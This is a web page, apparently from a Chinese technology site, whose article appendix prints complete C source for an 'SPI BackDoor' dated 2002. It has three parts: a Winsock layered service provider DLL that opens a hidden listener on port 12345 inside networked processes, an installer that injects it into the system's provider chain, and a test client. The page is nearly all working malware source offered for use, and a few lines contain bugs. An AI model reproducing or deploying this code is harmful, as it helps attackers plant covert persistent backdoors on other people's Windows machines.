扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
在本页阅读全文(共2页)
六)附录之源代码
1.backdoor源代码
#pragma data_seg("Shared")
int dllcount=0;
#pragma data_seg()
#pragma comment (linker,"/section:Shared,rws")
#define UNICODE
#define _UNICODE
#include <ws2spi.h>
#include <tchar.h>
#include <winsock2.h>
GUID filterguid={0xc5fabbd0,0x9736,0x11d1,{0x93,0x7f,0x00,0xc0,0x4f,0xad,0x86,0x0d}};
LPWSAPROTOCOL_INFOW protoinfo=NULL;
WSPPROC_TABLE nextproctable;
DWORD protoinfosize=0;
HANDLE hmutex;
HANDLE hthread;
POINT nowpt;
int totalprotos=0;
DWORD WINAPI backdoor(LPVOID)
{
SOCKET sock,sockt;
WSADATA wsa;
int iret=0;
char msg[25];
struct sockaddr_in sin;
if(WSAStartup(MAKEWORD(2,2),&wsa))
{
OutputDebugString(_T("WSAStartup Error!"));
return 0;
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
OutputDebugString(_T("Socket Error!"));
return 0;
}
sin.sin_addr.s_addr=htons(INADDR_ANY);
sin.sin_family=AF_INET;
sin.sin_port=htons(12345);
if(bind(sock,(struct sockaddr *)&sin,sizeof(sin))==SOCKET_ERROR)
{
OutputDebugString(_T("Bind Error!"));
return 0;
}
if(listen(sock,5)==SOCKET_ERROR)
{
OutputDebugString(_T("Listen Error!"));
return 0;
}
while(1)
{
if((sockt=accept(sock,NULL,NULL))==SOCKET_ERROR)
{
OutputDebugString(_T("Accept Error!"));
continue;
}
if((iret==recv(sockt,msg,sizeof(msg),0))==SOCKET_ERROR)
{
OutputDebugString(_T("Recv Error!"));
closesocket(sockt);
continue;
}
if(strstr(msg,"i am TOo2y"))
{
memset(msg,0,sizeof(msg));
memcpy(msg,"i am waiting for you !",sizeof(msg)-1);
if((iret==send(sockt,msg,sizeof(msg),0))==SOCKET_ERROR)
{
OutputDebugString(_T("Send Error!"));
closesocket(sockt);
continue;
}
}
OutputDebugString(_T("Transport Successfully"));
closesocket(sockt);
}
return 1;
}
BOOL getfilter()
{
int errorcode;
protoinfo=NULL;
protoinfosize=0;
totalprotos=0;
if(WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode)==SOCKET_ERROR)
{
if(errorcode!=WSAENOBUFS)
{
OutputDebugString(_T("First WSCEnumProtocols Error!"));
return FALSE;
}
}
if((protoinfo=(LPWSAPROTOCOL_INFOW)GlobalAlloc(GPTR,protoinfosize))==NULL)
{
OutputDebugString(_T("GlobalAlloc Error!"));
return FALSE;
}
if((totalprotos=WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode))==SOCKET_ERROR)
{
OutputDebugString(_T("Second WSCEnumProtocols Error!"));
return FALSE;
}
return TRUE;
}
void freefilter()
{
GlobalFree(protoinfo);
}
BOOL WINAPI DllMain(HINSTANCE hmodule,
DWORD reason,
LPVOID lpreserved)
{
TCHAR processname[MAX_PATH];
TCHAR showmessage[MAX_PATH+25];
switch(reason)
{
case DLL_PROCESS_ATTACH:
{
GetModuleFileName(NULL,processname,MAX_PATH);
_tcscpy(showmessage,processname);
_tcscat(showmessage,_T(" Loading my dll ..."));
OutputDebugString(showmessage);
hmutex=CreateMutex(NULL,FALSE,NULL);
WaitForSingleObject(hmutex,INFINITE);
dllcount++;
if(dllcount==1)
{
OutputDebugString(_T("Start the backdoor ..."));
hthread=CreateThread(NULL,0,backdoor,NULL,0,NULL);
}
ReleaseMutex(hmutex);
break;
}
case DLL_PROCESS_DETACH:
{
WaitForSingleObject(hmutex,INFINITE);
dllcount--;
if(dllcount==0)
{
CloseHandle(hthread);
}
ReleaseMutex(hmutex);
CloseHandle(hthread);
break;
}
}
return TRUE;
}
int WSPAPI WSPStartup(
WORD wversionrequested,
LPWSPDATA lpwspdata,
LPWSAPROTOCOL_INFOW lpprotoinfo,
WSPUPCALLTABLE upcalltable,
LPWSPPROC_TABLE lpproctable)
{
int i;
int errorcode;
int filterpathlen;
DWORD layerid=0;
DWORD nextlayerid=0;
TCHAR *filterpath;
HINSTANCE hfilter;
LPWSPSTARTUP wspstartupfunc=NULL;
if(lpprotoinfo->ProtocolChain.ChainLen<=1)
{
OutputDebugString(_T("ChainLen<=1"));
return FALSE;
}
getfilter();
for(i=0;i<totalprotos;i++)
{
if(memcmp(&protoinfo[i].ProviderId,&filterguid,sizeof(GUID))==0)
{
layerid=protoinfo[i].dwCatalogEntryId;
break;
}
}
for(i=0;i<lpprotoinfo->ProtocolChain.ChainLen;i++)
{
if(lpprotoinfo->ProtocolChain.ChainEntries[i]==layerid)
{
nextlayerid=lpprotoinfo->ProtocolChain.ChainEntries[i+1];
break;
}
}
filterpathlen=MAX_PATH;
filterpath=(TCHAR*)GlobalAlloc(GPTR,filterpathlen);
for(i=0;i<totalprotos;i++)
{
if(nextlayerid==protoinfo[i].dwCatalogEntryId)
{
if(WSCGetProviderPath(&protoinfo[i].ProviderId,filterpath,&filterpathlen,&errorcode)==SOCKET_ERROR)
{
OutputDebugString(_T("WSCGetProviderPath Error!"));
return WSAEPROVIDERFAILEDINIT;
}
break;
}
}
if(!ExpandEnvironmentStrings(filterpath,filterpath,MAX_PATH))
{
OutputDebugString(_T("ExpandEnvironmentStrings Error!"));
return WSAEPROVIDERFAILEDINIT;
}
if((hfilter=LoadLibrary(filterpath))==NULL)
{
OutputDebugString(_T("LoadLibrary Error!"));
return WSAEPROVIDERFAILEDINIT;
}
if((wspstartupfunc=(LPWSPSTARTUP)GetProcAddress(hfilter,"WSPStartup"))==NULL)
{
OutputDebugString(_T("GetProcessAddress Error!"));
return WSAEPROVIDERFAILEDINIT;
}
if((errorcode=wspstartupfunc(wversionrequested,lpwspdata,lpprotoinfo,upcalltable,lpproctable))!=ERROR_SUCCESS)
{
OutputDebugString(_T("wspstartupfunc Error!"));
return errorcode;
}
nextproctable=*lpproctable;
freefilter();
return 0;
}
#define UNICODE
#define _UNICODE
#include <stdio.h>
#include <tchar.h>
#include <string.h>
#include <ws2spi.h>
#include <sporder.h>
GUID filterguid={0xc5fabbd0,0x9736,0x11d1,{0x93,0x7f,0x00,0xc0,0x4f,0xad,0x86,0x0d}};
GUID filterchainguid={0xf9065320,0x9e90,0x11d1,{0x93,0x81,0x00,0xc0,0x4f,0xad,0x86,0x0d}};
BOOL getfilter();
void freefilter();
void installfilter();
void removefilter();
void start();
void usage();
int totalprotos=0;
DWORD protoinfosize=0;
LPWSAPROTOCOL_INFOW protoinfo=NULL;
int main(int argc,char *argv[])
{
start();
if(argc==2)
{
if(!strcmp(argv[1],"-install"))
{
installfilter();
return 0;
}
else if(!strcmp(argv[1],"-remove"))
{
removefilter();
return 0;
}
}
usage();
return 0;
}
BOOL getfilter()
{
int errorcode;
protoinfo=NULL;
totalprotos=0;
protoinfosize=0;
if(WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode)==SOCKET_ERROR)
{
if(errorcode!=WSAENOBUFS)
{
printf("First WSCEnumProtocols Error: %d\n",errorcode);
return FALSE;
}
}
if((protoinfo=(LPWSAPROTOCOL_INFOW)GlobalAlloc(GPTR,protoinfosize))==NULL)
{
printf("GlobalAlloc in getfilter Error: %d\n",GetLastError());
return FALSE;
}
if((totalprotos=WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode))==SOCKET_ERROR)
{
printf("Second WSCEnumProtocols Error: %d\n",GetLastError());
return FALSE;
}
printf("Found %d protocols!\n",totalprotos);
return TRUE;
}
void freefilter()
{
GlobalFree(protoinfo);
}
void installfilter()
{
int i;
int provcnt;
int cataindex;
int errorcode;
BOOL rawip=FALSE;
BOOL tcpip=FALSE;
DWORD iplayercataid=0,tcporigcataid;
TCHAR filter_path[MAX_PATH];
TCHAR filter_name[MAX_PATH];
TCHAR chainname[WSAPROTOCOL_LEN+1];
LPDWORD cataentries;
WSAPROTOCOL_INFOW iplayerinfo,tcpchaininfo,chainarray[1];
getfilter();
for(i=0;i<totalprotos;i++)
{
if(!rawip
&& protoinfo[i].iAddressFamily==AF_INET
&& protoinfo[i].iProtocol==IPPROTO_IP)
{
rawip=TRUE;
memcpy(&iplayerinfo,&protoinfo[i],sizeof(WSAPROTOCOL_INFOW));
iplayerinfo.dwServiceFlags1=protoinfo[i].dwServiceFlags1 &(~XP1_IFS_HANDLES);
}
if(!tcpip
&& protoinfo[i].iAddressFamily==AF_INET
&& protoinfo[i].iProtocol==IPPROTO_TCP)
{
tcpip=TRUE;
tcporigcataid=protoinfo[i].dwCatalogEntryId;
memcpy(&tcpchaininfo,&protoinfo[i],sizeof(WSAPROTOCOL_INFOW));
tcpchaininfo.dwServiceFlags1=protoinfo[i].dwServiceFlags1 &(~XP1_IFS_HANDLES);
}
}
_tcscpy(iplayerinfo.szProtocol,_TEXT("IP FILTER"));
iplayerinfo.ProtocolChain.ChainLen=LAYERED_PROTOCOL;
if(GetCurrentDirectory(MAX_PATH,filter_path)==0)
{
printf("GetCurrentDirectory Error: %d\n",GetLastError());
return ;
}
_tcscpy(filter_name,_TEXT("\\backdoor.dll"));
_tcscat(filter_path,filter_name);
if(WSCInstallProvider(&filterguid,filter_path,&iplayerinfo,1,&errorcode)==SOCKET_ERROR)
{
printf("WSCInstallProvider Error: %d\n",errorcode);
return ;
}
freefilter();
getfilter();
for(i=0;i<totalprotos;i++)
{
if(memcmp(&protoinfo[i].ProviderId,&filterguid,sizeof(GUID))==0)
{
iplayercataid=protoinfo[i].dwCatalogEntryId;
break;
}
}
provcnt=0;
if(tcpip)
{
swprintf(chainname,_TEXT("TCP FILTER"));
_tcscpy(tcpchaininfo.szProtocol,chainname);
if(tcpchaininfo.ProtocolChain.ChainLen==BASE_PROTOCOL)
{
tcpchaininfo.ProtocolChain.ChainEntries[1]=tcporigcataid;
}
else
{
for(i=tcpchaininfo.ProtocolChain.ChainLen;i>0;i--)
{
tcpchaininfo.ProtocolChain.ChainEntries[i+1]=tcpchaininfo.ProtocolChain.ChainEntries[i];
}
}
tcpchaininfo.ProtocolChain.ChainLen++;
tcpchaininfo.ProtocolChain.ChainEntries[0]=iplayercataid;
memcpy(&chainarray[provcnt++],&tcpchaininfo,sizeof(WSAPROTOCOL_INFOW));
}
if(WSCInstallProvider(&filterchainguid,filter_path,chainarray,provcnt,&errorcode)==SOCKET_ERROR)
{
printf("WSCInstallProvider for chain Error: %d\n",errorcode);
return ;
}
freefilter();
getfilter();
if((cataentries=(LPDWORD)GlobalAlloc(GPTR,totalprotos*sizeof(WSAPROTOCOL_INFOW)))==NULL)
{
printf("GlobalAlloc int installfilter Error: %d\n",errorcode);
return ;
}
cataindex=0;
for(i=0;i<totalprotos;i++)
{
if(memcmp(&protoinfo[i].ProviderId,&filterguid,sizeof(GUID))==0
|| memcmp(&protoinfo[i].ProviderId,&filterchainguid,sizeof(GUID))==0)
{
cataentries[cataindex++]=protoinfo[i].dwCatalogEntryId;
}
}
for(i=0;i<totalprotos;i++)
{
if(memcmp(&protoinfo[i].ProviderId,&filterguid,sizeof(GUID))!=0
&& memcmp(&protoinfo[i].ProviderId,&filterchainguid,sizeof(GUID))!=0)
{
cataentries[cataindex++]=protoinfo[i].dwCatalogEntryId;
}
}
if((errorcode==WSCWriteProviderOrder(cataentries,totalprotos))!=ERROR_SUCCESS)
{
printf("WSCWriteProviderOrder Error: %d\n",GetLastError());
return ;
}
freefilter();
}
void removefilter()
{
int errorcode;
if(WSCDeinstallProvider(&filterguid,&errorcode)==SOCKET_ERROR)
{
printf("WSCDeinstall filterguid Error: %d\n",errorcode);
}
if(WSCDeinstallProvider(&filterchainguid,&errorcode)==SOCKET_ERROR)
{
printf("WSCDeinstall filterchainguid Error: %d\n",errorcode);
}
return ;
}
void start()
{
printf("Install BackDoor, by TOo2y\n");
printf("E-mail: TOo2y@safechina.net\n");
printf("Homepage: www.safechina.net\n");
printf("Date: 11-3-2002\n\n");
return ;
}
void usage()
{
printf("instBD [ -install | -remove]\n");
return ;
}
3.testBD源代码
#include <winsock2.h>
#include <stdio.h>
#include <conio.h>
int main()
{
WSADATA wsa;
SOCKET sock;
struct sockaddr_in sin;
char msg[25]="i am TOo2y";
int iret;
printf("===[ Test for SPI BackDoor ]===\n");
printf("===[ TOo2y at 11-3-2002 ]===\n\n");
if(WSAStartup(MAKEWORD(2,2),&wsa))
{
printf("WSAStartup Error: %d\n",WSAGetLastError());
getche();
return -1;
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket Error: %d\n",WSAGetLastError());
getche();
return -1;
}
sin.sin_addr.s_addr=inet_addr("127.0.0.1");
sin.sin_family=AF_INET;
sin.sin_port=htons(12345);
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))==SOCKET_ERROR)
{
printf("Connect Error: %d\n",WSAGetLastError());
getche();
return -1;
}
if((iret=send(sock,msg,sizeof(msg),0))==SOCKET_ERROR)
{
printf("Send Error: %d\n",WSAGetLastError());
getche();
return -1;
}
memset(msg,0,sizeof(msg));
if((iret=recv(sock,msg,sizeof(msg),0))==SOCKET_ERROR)
{
printf("Recv Error: %d\n",WSAGetLastError());
getche();
return -1;
}
printf("Re: ");
printf(msg);
closesocket(sock);
WSACleanup();
getche();
return 0;
}
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者
京公网安备 11010802021500号